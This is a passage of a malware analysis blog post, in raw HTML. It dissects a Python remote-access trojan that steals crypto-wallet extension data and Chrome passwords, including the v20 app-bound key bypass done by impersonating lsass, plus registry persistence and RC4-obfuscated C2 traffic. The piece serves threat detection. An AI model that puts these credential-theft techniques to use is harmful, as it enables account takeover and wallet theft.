https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/7-740x621.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/7.png 1072w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Packet building using RC4<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Next, <strong>command.py<\/strong> is the dispatcher: it decodes each message received from the C2, maps its command code (one of the short strings listed in config.py) to a handler, runs that handler, and reports status back using the message types defined in the same config.py module we examined earlier.&nbsp;<\/p>\n\n\n\n<p>The key functions are:&nbsp;<\/p>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-246\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"2\"\n           data-rows=\"7\"\n           data-wpID=\"246\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell \"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:50%;                    padding:10px;\n                    \"\n                    >\n                                        Function\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell \"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:50%;                    padding:10px;\n                    \"\n                    >\n                                        Description\u00a0                    <\/th>\n                  
                      <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        ProcessInfo\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Collects the current user, hostname, OS, architecture, and the malware (daemon) version.\u00a0\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        ProcessUpload\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Allows the attacker to upload compressed files to the victim\u2019s machine.\u00a0                    <\/td>\n     
                                   <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        ProcessDownload\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Stages files or folders for exfiltration. If the target is a folder, it gets compressed before transmission.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        ProcessTerminal\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Opens a reverse shell or executes arbitrary commands, depending on the mode 
selected.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        makeMsg0623 \/ decodeMsg0623\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Serialize and deserialize base64-encoded messages exchanged between implant and C2.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A7\"\n                    data-col-index=\"0\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        ProcessAuto:\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B7\"\n                    data-col-index=\"1\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Triggers automation routines from the auto.py 
module\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-246'>\ntable#wpdtSimpleTable-246{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-246 td, table.wpdtSimpleTable246 th { white-space: normal !important; }\n<\/style>\n\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"987\" height=\"1024\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/8-987x1024.png\" alt=\"\" class=\"wp-image-15301\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/8-987x1024.png 987w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/8-289x300.png 289w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/8-768x796.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/8-370x384.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/8-270x280.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/8-740x767.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/8.png 1240w\" sizes=\"(max-width: 987px) 100vw, 987px\" \/><figcaption class=\"wp-element-caption\"><em>Function to open a reverse shell or run arbitrary commands<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>You probably remember that command.py imports two other custom modules: <strong>util.py and auto.py<\/strong>. 
Let&#8217;s review them as well.&nbsp;<\/p>\n\n\n\n<p>Module util.py implements three functions:&nbsp;<\/p>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-247\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"2\"\n           data-rows=\"4\"\n           data-wpID=\"247\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell \"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:50%;                    padding:10px;\n                    \"\n                    >\n                                        Function\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell \"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:50%;                    padding:10px;\n                    \"\n                    >\n                                        Description\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        com0715press\u00a0                    <\/td>\n                    
                            <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Compresses files in-memory as .tar.gz\u00a0\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        decom0715press\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Extracts .tar.gz files from memory to disk\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        valid0715relPath\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                   
data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Validates file paths to prevent path traversal\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-247'>\ntable#wpdtSimpleTable-247{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-247 td, table.wpdtSimpleTable247 th { white-space: normal !important; }\n<\/style>\n\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"945\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/9-1024x945.png\" alt=\"\" class=\"wp-image-15302\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/9-1024x945.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/9-300x277.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/9-768x709.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/9-370x342.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/9-270x249.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/9-740x683.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/9.png 1432w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Auxiliary functions from util.py<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Finally, the most critical module:&nbsp;<strong>auto.py<\/strong>.&nbsp;<\/p>\n\n\n\n<p>This module implements two key functions:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>AutoGatherMode: <\/strong>Collects configuration data from cryptocurrency browser 
extensions such as MetaMask, BitKeep, Coinbase Wallet, and Phantom.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>AutoCookieMode:<\/strong> Extracts login artifacts, including credentials and cookies, from Google Chrome.&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>The&nbsp;autoGatherMode&nbsp;function searches for the user\u2019s Google Chrome profile directory (AppData\\Local\\Google\\Chrome\\User Data), starting with the&nbsp;<strong>Default<\/strong>&nbsp;profile and then enumerating others. It compresses the configuration directories of the targeted extensions into a single archive named&nbsp;gather.tar.gz&nbsp;and exfiltrates it for manual analysis, with the goal of enabling account takeover or compromising cryptocurrency wallets.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/10-1024x576.png\" alt=\"\" class=\"wp-image-15303\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/10-1024x576.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/10-300x169.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/10-768x432.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/10-1536x864.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/10-370x208.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/10-270x152.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/10-740x416.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/10.png 1976w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Exfiltrating Google Chrome Profiles in a compressed file<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>With the rise of information-stealing 
malware, browser vendors have introduced various countermeasures to protect sensitive data such as password managers, cookies, and encrypted storage vaults. Chrome is no exception. To bypass these protections, the malware includes functions designed to check whether the user has administrative privileges and to retrieve Chrome\u2019s encryption key through different methods, depending on the browser version, as the protection mechanisms vary.&nbsp;<\/p>\n\n\n\n<p>The <strong>autoCookieMode <\/strong>function, on the other hand, starts by checking if the user has administrative privileges. If not, it relaunches itself using&nbsp;runas, triggering a UAC (User Account Control) prompt. The prompt is intentionally deceptive: it simply displays \u201cpython.exe\u201d as the requesting binary, providing no additional context or visual indicators. This subtle form of social engineering increases the likelihood of the user granting permission.&nbsp;<\/p>\n\n\n\n<p>If the prompt is accepted, the malware gains elevated privileges, which are necessary to interact with privileged APIs such as the&nbsp;<strong>Data Protection API (DPAPI)<\/strong>&nbsp;used to retrieve Chrome\u2019s encryption keys. 
If the user declines, the malware continues execution with the current user\u2019s privileges.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"529\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/11-1024x529.png\" alt=\"\" class=\"wp-image-15304\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/11-1024x529.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/11-300x155.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/11-768x397.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/11-370x191.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/11-270x139.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/11-740x382.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/11.png 1520w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Malicious UAC prompt<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>It then creates a file named chrome_logins_dump.txt to store the extracted credentials. To do so, it accesses Chrome\u2019s Local State file, which contains either an encrypted_key (in v10) or an app_bound_encrypted_key (in v20+). These keys are not stored in plaintext but encoded in Base64 and encrypted using Windows DPAPI. 
While they are accessible to the current user, they require decryption before use.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"840\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/12-1024x840.png\" alt=\"\" class=\"wp-image-15305\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/12-1024x840.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/12-300x246.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/12-768x630.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/12-370x303.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/12-270x221.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/12-740x607.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/12.png 1512w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Google Chrome Keys Harvesting<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>In Chrome v10, the encryption key is protected solely by the user\u2019s DPAPI context and can be decrypted directly. In Chrome v20 and later, the key is&nbsp;<strong>app-bound<\/strong>&nbsp;and encrypted twice \u2014 first with the machine\u2019s DPAPI context, and then again with the user\u2019s. 
To bypass this layered protection, the malware impersonates the&nbsp;lsass.exe&nbsp;process to temporarily gain&nbsp;<strong>SYSTEM<\/strong>&nbsp;privileges.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"597\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/13-1024x597.png\" alt=\"\" class=\"wp-image-15306\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/13-1024x597.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/13-300x175.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/13-768x448.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/13-370x216.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/13-270x157.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/13-740x431.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/13.png 1342w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Impersonating lsass.exe<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>It then applies both layers of decryption, yielding a key blob which, once parsed, reveals the AES master key used to decrypt Chrome\u2019s stored credentials.&nbsp;<\/p>\n\n\n\n<p>Once the key is obtained by either method, the malware connects to the Login Data SQLite database and extracts all stored credentials, applying the corresponding decryption logic for v10 or v20 entries depending on the case.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"661\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/14-1024x661.png\" alt=\"\" class=\"wp-image-15307\" 
srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/14-1024x661.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/14-300x194.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/14-768x496.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/14-1536x991.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/14-370x239.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/14-270x174.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/14-740x477.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/14.png 1742w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Credentials dumped by the process<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>At this point, it\u2019s game over for the victim.&nbsp;<\/p>\n\n\n\n<p>With the module functionality now understood, the next step is to examine the malware\u2019s core component:&nbsp;<strong>nvidia.py<\/strong>. 
Before diving in, here\u2019s a summary of the auxiliary functions contained in this module.&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>check_adminRole: Checks whether the current process has administrative privileges using IsUserAnAdmin().&nbsp;<\/li>\n<li>GetSecretKey: Extracts and decrypts the AES key used by Chrome (v10) from the Local State file using DPAPI.&nbsp;<\/li>\n<li>DecryPayload: Decrypts a payload using a given cipher.&nbsp;<\/li>\n<li>GenCipher: Constructs an AES-GCM cipher object using a given key and IV.&nbsp;<\/li>\n<li>DecryPwd: Decrypts v10-style Chrome passwords using AES-GCM and the secret key obtained via DPAPI.&nbsp;<\/li>\n<li>impersonate_lsass: Context manager that impersonates the lsass.exe process to gain SYSTEM privileges.&nbsp;<\/li>\n<li>parse_key_blob: Parses Chrome\u2019s v20 encrypted key blob structure to extract the IV, ciphertext, tag, and (if present) encrypted AES key.&nbsp;<\/li>\n<li>decrypt_with_cng: Decrypts data using the Windows CNG API and a hardcoded key name (\u201cGoogle Chromekey1\u201d).&nbsp;<\/li>\n<li>byte_xor: Performs XOR between two byte arrays (used to unmask the AES key in v20 key blobs).&nbsp;<\/li>\n<li>derive_v20_master_key: Decrypts and derives the AES master key from parsed v20 Chrome blobs, supporting multiple encryption flags (AES, ChaCha20, masked AES).&nbsp;<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">From Recon to Full Control&nbsp;<\/h2>\n\n\n\n<p>Now, to the core component:&nbsp;<strong>nvidia.py<\/strong>.&nbsp;<\/p>\n\n\n\n<p>This module begins by creating a registry key to establish 
persistence, assigning a unique identifier (UUID) to the host, and creating a pseudo\u2013mutex-like mechanism via a&nbsp;.store&nbsp;file to prevent multiple instances from running simultaneously. It then enters a loop, continuously listening for new instructions from the C2 server. Additionally, it supports standalone execution with specific command-line arguments, enabling it to immediately perform actions such as stealing cookies or login data.&nbsp;<\/p>\n\n\n\n<p>Analysis in&nbsp;<strong><a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=pylangghost_rat&amp;utm_term=060825&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN<\/a><\/strong>&nbsp;shows that all communication with the C2 servers is carried out over raw IP addresses, with no domain names used. While the traffic is not encrypted with TLS, it is at least obfuscated using RC4; a weak method, but still an added layer of concealment.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/275e3573-0b3e-4e77-afaf-fe99b935c510\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=pylangghost_rat&amp;utm_term=060825&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">View real case inside ANY.RUN sandbox<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"656\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/15-1024x656.png\" alt=\"\" class=\"wp-image-15308\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/15-1024x656.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/15-300x192.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/15-768x492.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/15-1536x985.png 1536w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/15-2048x1313.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/15-370x237.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/15-270x173.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/15-740x474.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Traffic to the C2 Server<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>The sandbox quickly flags the traffic as suspicious. Because the malware uses the default&nbsp;python-requests&nbsp;User-Agent and sends multiple rapid requests, this pattern becomes a reliable detection indicator.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"510\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/16-1024x510.png\" alt=\"\" class=\"wp-image-15309\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/16-1024x510.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/16-300x149.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/16-768x382.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/16-1536x765.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/16-370x184.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/16-270x134.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/16-740x369.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/16.png 2004w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Traffic is automatically marked as suspicious<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Another key observation: most of the malware artifacts used in this campaign register only 0 to 3 detections on VirusTotal, making them particularly stealthy. 
Fortunately,&nbsp;<strong>ANY.RUN<\/strong>&nbsp;immediately identifies these samples as 100\/100 malicious, starting with the initial&nbsp;update.vbs&nbsp;loader.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"440\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/17-1024x440.png\" alt=\"\" class=\"wp-image-15310\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/17-1024x440.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/17-300x129.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/17-768x330.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/17-1536x660.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/17-2048x880.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/17-370x159.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/17-270x116.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/17-740x318.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>update.vbs loader marked as malicious<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Other components, including&nbsp;nvidia.py, the main launcher, are also flagged instantly with a 100\/100 score, providing early warning against this evolving threat.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"438\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/18-1024x438.png\" alt=\"\" class=\"wp-image-15311\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/18-1024x438.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/18-300x128.png 300w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/18-768x328.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/18-1536x656.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/18-2048x875.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/18-370x158.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/18-270x115.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/18-740x316.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>nvidia.py loader marked as malicious<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>New malware, you say? Let\u2019s take a closer look.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Gophers, Ghosts &amp; AI&nbsp;<\/h2>\n\n\n\n<p>A variant of this sample was recently observed by other security laboratories, which noted strong similarities to&nbsp;<strong>GoLangGhost RAT<\/strong>. In fact, this appears to be a full reimplementation of that RAT in Python, but with a notable twist.&nbsp;<\/p>\n\n\n\n<p>Analysis revealed numerous linguistic patterns and unusual coding constructions, including dead code, large commented-out sections, and Go-style logic structures, suggesting that the port from Go to Python was at least partially assisted by AI tools.&nbsp;<\/p>\n\n\n\n<p>Ghosts, Gophers, Pythons, and AI, all converging in a single malware family. 
